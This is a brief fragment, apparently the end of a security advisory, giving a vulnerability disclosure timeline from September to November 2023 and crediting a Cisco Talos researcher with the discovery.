2023-09-18 - Vendor Disclosure
2023-11-22 - Vendor Patch Release
2023-11-27 - Public Release

Credit

Discovered by Kamlapati Choubey of Cisco Talos.